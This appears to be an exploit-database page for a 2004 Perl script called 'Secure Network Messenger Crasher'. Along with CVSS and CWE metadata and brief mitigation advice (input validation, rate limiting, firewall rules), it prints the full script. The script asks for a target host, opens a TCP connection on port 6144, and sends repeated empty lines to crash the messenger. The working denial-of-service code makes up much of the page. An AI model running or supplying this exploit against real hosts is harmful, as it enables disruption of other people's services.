header-logo
Suggest Exploit
vendor:
Secure Network Messenger
by:
ClearScreen
3.3
CVSS
LOW
Denial of Service (DoS)
400
CWE
Product Name: Secure Network Messenger
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

Secure Network Messenger Crasher

This Perl script is designed to crash a secure network messenger by flooding it with empty packets. It prompts the user to enter the host to crash and establishes a TCP connection on port 6144. It then sends a series of empty packets to the target host, causing it to crash. The script attempts to establish the connection 15 times.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and rate limiting mechanisms in the network messenger application. Additionally, the use of firewall rules to restrict access to the affected port can help prevent exploitation.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
        Proto => "tcp",
        PeerPort => "6144",
        PeerAddr => "$h"
) or die "\nNo response from host.";

sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
 print $socks "\n";
 select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;

# milw0rm.com [2004-11-15]

Navigation

Suggest Exploit

Services By CQR